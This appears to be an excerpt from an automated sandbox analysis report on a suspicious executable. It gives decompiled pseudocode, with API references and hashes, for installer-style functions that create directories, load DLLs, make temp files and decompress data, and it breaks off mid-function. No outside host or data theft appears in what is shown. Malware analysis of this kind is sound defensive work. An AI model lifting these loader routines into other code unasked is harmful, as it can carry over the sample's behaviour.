                                                                                                                          • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                                                                                          • GetLastError.KERNEL32 ref: 0040539D
                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                                                                                          • GetLastError.KERNEL32 ref: 004053BC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                          • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                                                          • API String ID: 3449924974-1629030221
                                                                                                                          • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                          • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                                                                                          • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                          • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                                                          0x00405ed1
                                                                                                                          0x00405eda
                                                                                                                          0x00405edc
                                                                                                                          0x00405edc
                                                                                                                          0x00405ee0
                                                                                                                          0x00405ef2
                                                                                                                          0x00405eec
                                                                                                                          0x00405eec
                                                                                                                          0x00405eec
                                                                                                                          0x00405ef6
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f1e
                                                                                                                          0x00405f25

                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                                                                                                          • wsprintfA.USER32 ref: 00405F0A
                                                                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                                                                          • API String ID: 2200240437-4240819195
                                                                                                                          • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                          • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                                                                                                          • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                          • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                                          0x004058a2
                                                                                                                          0x004058a8
                                                                                                                          0x004058a9
                                                                                                                          0x004058a9
                                                                                                                          0x004058aa
                                                                                                                          0x004058b1
                                                                                                                          0x004058bb
                                                                                                                          0x004058c8
                                                                                                                          0x004058cb
                                                                                                                          0x004058d3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004058d7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004058d9
                                                                                                                          0x00000000
                                                                                                                          0x004058d9
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 004058B1
                                                                                                                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058CB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\PQMW0W5h3X.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-1170876916
                                                                                                                          • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                          • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                                                                                                          • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                          • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1000198F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E1000198F(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				 *0x10004060 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E1000189E);
				_push(1); // executed
				_t34 = E10001D3B(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100023F6(_t50);
					}
					E10002440(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100025FE(_t65, _t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100018A1(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100025FE(_t65, _t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100025FE(_t65, _t50);
							_t34 = GlobalFree(E1000159E(E100018A1(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E100025C4(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E10001825( *0x10004054);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E100014C7(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000120C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E100027AC(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                                                                                          0x1000198f
                                                                                                                          0x1000198f
                                                                                                                          0x1000198f
                                                                                                                          0x10001999
                                                                                                                          0x100019a1
                                                                                                                          0x100019ae
                                                                                                                          0x100019bc
                                                                                                                          0x100019bf
                                                                                                                          0x100019c1
                                                                                                                          0x100019c6
                                                                                                                          0x100019cb
                                                                                                                          0x10001ade
                                                                                                                          0x10001ade
                                                                                                                          0x100019d1
                                                                                                                          0x100019d5
                                                                                                                          0x100019d8
                                                                                                                          0x100019dd
                                                                                                                          0x100019df
                                                                                                                          0x100019e5
                                                                                                                          0x100019eb
                                                                                                                          0x10001a1b
                                                                                                                          0x10001a22
                                                                                                                          0x10001a46
                                                                                                                          0x10001a85
                                                                                                                          0x10001a48
                                                                                                                          0x10001a48
                                                                                                                          0x10001a49
                                                                                                                          0x10001a4c
                                                                                                                          0x10001a52
                                                                                                                          0x10001a56
                                                                                                                          0x10001a59
                                                                                                                          0x10001a5e
                                                                                                                          0x10001a5e
                                                                                                                          0x10001a65
                                                                                                                          0x10001a6b
                                                                                                                          0x10001a71
                                                                                                                          0x10001a7d
                                                                                                                          0x10001a7e
                                                                                                                          0x10001a81
                                                                                                                          0x10001a24
                                                                                                                          0x10001a25
                                                                                                                          0x10001a3a
                                                                                                                          0x10001a3a
                                                                                                                          0x10001a8f
                                                                                                                          0x10001a92
                                                                                                                          0x10001a9f
                                                                                                                          0x10001aa6
                                                                                                                          0x10001aae
                                                                                                                          0x10001ab1
                                                                                                                          0x10001ab1
                                                                                                                          0x10001aae
                                                                                                                          0x10001abe
                                                                                                                          0x10001ac6
                                                                                                                          0x10001acb
                                                                                                                          0x10001abe
                                                                                                                          0x10001ad3
                                                                                                                          0x00000000
                                                                                                                          0x10001ad5
                                                                                                                          0x00000000
                                                                                                                          0x10001ad6
                                                                                                                          0x10001ad3
                                                                                                                          0x100019ef
                                                                                                                          0x100019f2
                                                                                                                          0x10001a10
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001a13
                                                                                                                          0x10001a18
                                                                                                                          0x10001a18
                                                                                                                          0x10001a1a
                                                                                                                          0x00000000
                                                                                                                          0x10001a1a
                                                                                                                          0x100019f4
                                                                                                                          0x100019f5
                                                                                                                          0x100019fd
                                                                                                                          0x100019fe
                                                                                                                          0x00000000
                                                                                                                          0x100019fe
                                                                                                                          0x100019f7
                                                                                                                          0x100019f8
                                                                                                                          0x10001a06
                                                                                                                          0x00000000
                                                                                                                          0x10001a06
                                                                                                                          0x100019fb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100019fb

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F80
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F85
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F8A
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001A3A
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 10001AB1
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001AD6
                                                                                                                            • Part of subcall function 100023F6: GlobalAlloc.KERNEL32(00000040,E8002080), ref: 10002428
                                                                                                                            • Part of subcall function 100027AC: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,?,10001A0B,00000000), ref: 100027FC
                                                                                                                            • Part of subcall function 100018A1: lstrcpyA.KERNEL32(00000000,10004018,00000000,10001967,00000000), ref: 100018BA
                                                                                                                            • Part of subcall function 100025FE: wsprintfA.USER32 ref: 10002661
                                                                                                                            • Part of subcall function 100025FE: GlobalFree.KERNEL32 ref: 10002706
                                                                                                                            • Part of subcall function 100025FE: GlobalFree.KERNEL32 ref: 1000272F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767494692-3916222277
                                                                                                                          • Opcode ID: cc2172aae9428d7729c1cd1f9767f5c99f96f95dfb3527aa64e3656f829a4ce9
                                                                                                                          • Instruction ID: 1b0dc91ba56891906fbd81f42daf338cc13d67ac49f1a81c08d76b9c21eb2167
                                                                                                                          • Opcode Fuzzy Hash: cc2172aae9428d7729c1cd1f9767f5c99f96f95dfb3527aa64e3656f829a4ce9
                                                                                                                          • Instruction Fuzzy Hash: 0031B175601245AAFB41DF649CC5BDA3BE8FF062E0F048425FD066A09FCF749845CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                          0x00401f84
                                                                                                                          0x00401f84
                                                                                                                          0x00401f89
                                                                                                                          0x00401f90
                                                                                                                          0x0040204c
                                                                                                                          0x00402197
                                                                                                                          0x00402197
                                                                                                                          0x004028be
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd
                                                                                                                          0x004028cd
                                                                                                                          0x00401f9f
                                                                                                                          0x00401fa9
                                                                                                                          0x00401fac
                                                                                                                          0x00401fbb
                                                                                                                          0x00401fbf
                                                                                                                          0x00401fc5
                                                                                                                          0x00401fc9
                                                                                                                          0x00402045
                                                                                                                          0x00000000
                                                                                                                          0x00402045
                                                                                                                          0x00401fcb
                                                                                                                          0x00401fd5
                                                                                                                          0x00401fd9
                                                                                                                          0x0040201d
                                                                                                                          0x00401fdb
                                                                                                                          0x00401fde
                                                                                                                          0x00401fe1
                                                                                                                          0x00402011
                                                                                                                          0x00401fe3
                                                                                                                          0x00401fe6
                                                                                                                          0x00401fef
                                                                                                                          0x00401ff1
                                                                                                                          0x00401ff1
                                                                                                                          0x00401fef
                                                                                                                          0x00401fe1
                                                                                                                          0x00402025
                                                                                                                          0x0040203a
                                                                                                                          0x0040203a
                                                                                                                          0x00000000
                                                                                                                          0x00402025
                                                                                                                          0x00401faf
                                                                                                                          0x00401fb5
                                                                                                                          0x00401fb9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                                                                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                            • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                            • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                            • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                            • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                            • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2987980305-0
                                                                                                                          • Opcode ID: 7d6bbd44808b66ffa584f43e8c4aa3573383001e876b7905c6c28b9b395068af
                                                                                                                          • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                                                                                                          • Opcode Fuzzy Hash: 7d6bbd44808b66ffa584f43e8c4aa3573383001e876b7905c6c28b9b395068af
                                                                                                                          • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                                                          0x004015b3
                                                                                                                          0x004015ba
                                                                                                                          0x004015bd
                                                                                                                          0x004015c2
                                                                                                                          0x004015c6
                                                                                                                          0x004015c8
                                                                                                                          0x004015d0
                                                                                                                          0x004015d2
                                                                                                                          0x004015d4
                                                                                                                          0x004015d8
                                                                                                                          0x004015db
                                                                                                                          0x004015f3
                                                                                                                          0x004015f4
                                                                                                                          0x004015dd
                                                                                                                          0x004015dd
                                                                                                                          0x004015e0
                                                                                                                          0x00000000
                                                                                                                          0x004015eb
                                                                                                                          0x004015ec
                                                                                                                          0x004015ec
                                                                                                                          0x004015e0
                                                                                                                          0x004015fb
                                                                                                                          0x00401602
                                                                                                                          0x0040160f
                                                                                                                          0x0040160f
                                                                                                                          0x00401604
                                                                                                                          0x00401605
                                                                                                                          0x0040160d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040160d
                                                                                                                          0x00401602
                                                                                                                          0x00401612
                                                                                                                          0x00401615
                                                                                                                          0x00401617
                                                                                                                          0x00401618
                                                                                                                          0x004015c8
                                                                                                                          0x0040161f
                                                                                                                          0x0040164a
                                                                                                                          0x00402197
                                                                                                                          0x00401621
                                                                                                                          0x00401623
                                                                                                                          0x0040162e
                                                                                                                          0x00401634
                                                                                                                          0x0040163c
                                                                                                                          0x00401642
                                                                                                                          0x00401642
                                                                                                                          0x0040163c
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                                                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                                                                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                            • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 1892508949-1104044542
                                                                                                                          • Opcode ID: 68e7b39f27e2b00361e68aa136da5f419b93ec0988189e82b4baa53dd5dee2d9
                                                                                                                          • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                                                                                                          • Opcode Fuzzy Hash: 68e7b39f27e2b00361e68aa136da5f419b93ec0988189e82b4baa53dd5dee2d9
                                                                                                                          • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 99%
                                                                                                                          			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
